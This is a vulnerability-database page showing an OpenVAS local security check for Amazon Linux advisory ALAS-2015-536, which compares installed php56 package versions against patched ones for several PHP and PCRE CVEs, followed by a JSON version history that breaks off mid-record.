Search...

Amazon Linux Local Check: alas-2015-536

2015-09-08T00:00:00

ID OPENVAS:1361412562310120222
Type openvas
Reporter Eero Volotinen
Modified 2017-07-06T00:00:00

Description

Amazon Linux Local Security Checks

                                        
                                            # OpenVAS Vulnerability Test 
# Description: Amazon Linux security check 
# $Id: alas-2015-536.nasl 6575 2017-07-06 13:42:08Z cfischer $
 
# Authors: 
# Eero Volotinen &lt;eero.volotinen@iki.fi&gt; 
#
# Copyright:
# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org 
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
if(description)
 {
script_oid("1.3.6.1.4.1.25623.1.0.120222");
script_version("$Revision: 6575 $");
script_tag(name:"creation_date", value:"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)");
script_tag(name:"last_modification", value:"$Date: 2017-07-06 15:42:08 +0200 (Thu, 06 Jul 2017) $");
script_name("Amazon Linux Local Check: alas-2015-536");
script_tag(name: "insight", value: "An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )"); 
script_tag(name : "solution", value : "Run yum update php56 to update your system.");
script_tag(name : "solution_type", value : "VendorFix");
script_xref(name : "URL" , value : "https://alas.aws.amazon.com/ALAS-2015-536.html");
script_cve_id("CVE-2015-4021","CVE-2015-4022","CVE-2015-4025","CVE-2015-4024","CVE-2015-4026","CVE-2015-2325","CVE-2015-2326");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"qod_type", value:"package");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/amazon_linux", "ssh/login/release");
script_category(ACT_GATHER_INFO);
script_tag(name:"summary", value:"Amazon Linux Local Security Checks");
script_copyright("Eero Volotinen");
script_family("Amazon Linux Local Security Checks");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL)
{
 exit(0);
}
if(release == "AMAZON")
{
if ((res = isrpmvuln(pkg:"php56-ldap", rpm:"php56-ldap~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-bcmath", rpm:"php56-bcmath~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-cli", rpm:"php56-cli~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-intl", rpm:"php56-intl~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-devel", rpm:"php56-devel~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-common", rpm:"php56-common~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-imap", rpm:"php56-imap~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-gd", rpm:"php56-gd~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mysqlnd", rpm:"php56-mysqlnd~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mssql", rpm:"php56-mssql~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-enchant", rpm:"php56-enchant~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-debuginfo", rpm:"php56-debuginfo~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-process", rpm:"php56-process~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-fpm", rpm:"php56-fpm~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-pdo", rpm:"php56-pdo~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-odbc", rpm:"php56-odbc~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-xml", rpm:"php56-xml~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mcrypt", rpm:"php56-mcrypt~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-recode", rpm:"php56-recode~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-dba", rpm:"php56-dba~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-xmlrpc", rpm:"php56-xmlrpc~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-pgsql", rpm:"php56-pgsql~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-mbstring", rpm:"php56-mbstring~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-pspell", rpm:"php56-pspell~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56", rpm:"php56~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-embedded", rpm:"php56-embedded~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-gmp", rpm:"php56-gmp~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-soap", rpm:"php56-soap~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-opcache", rpm:"php56-opcache~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-tidy", rpm:"php56-tidy~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-snmp", rpm:"php56-snmp~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if ((res = isrpmvuln(pkg:"php56-dbg", rpm:"php56-dbg~5.6.9~1.112.amzn1", rls:"AMAZON")) != NULL) {
  security_message(data:res);
  exit(0);
}
if (__pkg_match) exit(99); #Not vulnerable
  exit(0);
}

JSON Vulners Source

Initial Source

{"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "history": [{"lastseen": "2017-07-18T10:52:46", "differentElements": ["modified", "sourceData"], "edition": 2, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "history": [], "naslFamily": "Amazon Linux Local Security Checks", "id": "OPENVAS:1361412562310120222", "title": "Amazon Linux Local Check: alas-2015-536", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "modified", "hash": "3984a841a83f9bbaddbf64db40746d40"}, {"key": "sourceData", "hash": "88a3eef0ad62d205a032ce1b85679e1d"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "cvelist", "hash": "051d3fa80639370fd8e85d743d26684b"}, {"key": "pluginID", "hash": "15a1c50a40bcb97a18bd75742b61fd60"}, {"key": "published", "hash": "166e43b7efd51fc461aa157ed9ed169d"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "href", "hash": "c987a25a392ca9438af43d057067b21a"}, {"key": "naslFamily", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "title", "hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50"}, {"key": "description", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "references", "hash": "260dd5f8477dc74ecc091d01197c5f94"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}], "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 6505 2017-07-03 09:58:27Z teissa $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 6505 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2017-07-03 11:58:27 +0200 (Mon, 03 Jul 2017) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"HostDetails/OS/cpe:/o:amazon:linux\", \"login/SSH/success\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-fpm\", rpm:\"php56-fpm~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pdo\", rpm:\"php56-pdo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-odbc\", rpm:\"php56-odbc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xml\", rpm:\"php56-xml~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mcrypt\", rpm:\"php56-mcrypt~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-recode\", rpm:\"php56-recode~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dba\", rpm:\"php56-dba~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-xmlrpc\", rpm:\"php56-xmlrpc~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pgsql\", rpm:\"php56-pgsql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mbstring\", rpm:\"php56-mbstring~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-pspell\", rpm:\"php56-pspell~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56\", rpm:\"php56~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-embedded\", rpm:\"php56-embedded~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gmp\", rpm:\"php56-gmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-soap\", rpm:\"php56-soap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-opcache\", rpm:\"php56-opcache~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-tidy\", rpm:\"php56-tidy~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-snmp\", rpm:\"php56-snmp~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-dbg\", rpm:\"php56-dbg~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99); #Not vulnerable\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "pluginID": "1361412562310120222", "hash": "b5a5afe45e7c43b10b70850efbb95eccde3d251cfc5a595f10c92c6af87e9a7f", "modified": "2017-07-03T00:00:00", "edition": 2, "cvelist": ["CVE-2015-2325", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022", "CVE-2015-2326"], "lastseen": "2017-07-18T10:52:46", "viewCount": 0, "enchantments": {}, "reporter": "Eero Volotinen", "objectVersion": "1.3", "references": ["https://alas.aws.amazon.com/ALAS-2015-536.html"]}}, {"lastseen": "2017-07-02T21:12:30", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120222", "history": [], "naslFamily": "Amazon Linux Local Security Checks", "id": "OPENVAS:1361412562310120222", "title": "Amazon Linux Local Check: alas-2015-536", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "sourceData", "hash": "5029de750654892f1966bd4d7c25eb74"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "modified", "hash": "451ccf9b33cae434b1236ed7a06114ec"}, {"key": "cvelist", "hash": "051d3fa80639370fd8e85d743d26684b"}, {"key": "pluginID", "hash": "15a1c50a40bcb97a18bd75742b61fd60"}, {"key": "published", "hash": "166e43b7efd51fc461aa157ed9ed169d"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "href", "hash": "c987a25a392ca9438af43d057067b21a"}, {"key": "naslFamily", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "title", "hash": "73a8d6ff1a2cd0ef2d387ce18a30cf50"}, {"key": "description", "hash": "df5cd238ab6ba820ee0b13c493f1bcd6"}, {"key": "references", "hash": "260dd5f8477dc74ecc091d01197c5f94"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}], "sourceData": "# OpenVAS Vulnerability Test \n# Description: Amazon Linux security check \n# $Id: alas-2015-536.nasl 4513 2016-11-15 09:37:48Z cfi $\n \n# Authors: \n# Eero Volotinen <eero.volotinen@iki.fi> \n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.120222\");\nscript_version(\"$Revision: 4513 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-08 13:20:42 +0200 (Tue, 08 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2016-11-15 10:37:48 +0100 (Tue, 15 Nov 2016) $\");\nscript_name(\"Amazon Linux Local Check: alas-2015-536\");\nscript_tag(name: \"insight\", value: \"An integer underflow flaw leading to out-of-bounds memory access was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-4021 )An integer overflow flaw leading to a heap based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022 )A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4025 )It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-4026 )PCRE library is prone to a heap overflow vulnerability. Due to insufficient bounds checking inside compile_branch(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications using it. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2325 )PCRE library is prone to a vulnerability which leads to Heap overflow. Without enough bound checking inside pcre_compile2(), the heap memory could be overflowed via a crafted regular expression. Since PCRE library is widely used, this vulnerability should affect many applications. An attacker may exploit this issue to execute arbitrary code in the context of the user running the affected application. (CVE-2015-2326 )\"); \nscript_tag(name : \"solution\", value : \"Run yum update php56 to update your system.\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://alas.aws.amazon.com/ALAS-2015-536.html\");\nscript_cve_id(\"CVE-2015-4021\",\"CVE-2015-4022\",\"CVE-2015-4025\",\"CVE-2015-4024\",\"CVE-2015-4026\",\"CVE-2015-2325\",\"CVE-2015-2326\");\nscript_tag(name:\"cvss_base\", value:\"7.5\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"HostDetails/OS/cpe:/o:amazon:linux\", \"login/SSH/success\", \"ssh/login/release\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\nscript_summary(\"Amazon Linux Local Security Checks alas-2015-536\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Amazon Linux Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\nrelease = get_kb_item(\"ssh/login/release\");\nres = \"\";\nif(release == NULL)\n{\n exit(0);\n}\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"php56-ldap\", rpm:\"php56-ldap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-bcmath\", rpm:\"php56-bcmath~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-cli\", rpm:\"php56-cli~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-intl\", rpm:\"php56-intl~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-devel\", rpm:\"php56-devel~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-common\", rpm:\"php56-common~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-imap\", rpm:\"php56-imap~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-gd\", rpm:\"php56-gd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mysqlnd\", rpm:\"php56-mysqlnd~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-mssql\", rpm:\"php56-mssql~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-enchant\", rpm:\"php56-enchant~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-debuginfo\", rpm:\"php56-debuginfo~5.6.9~1.112.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"php56-process\", rpm:\"php56-process~5.6.9~1.112.amzn1\", 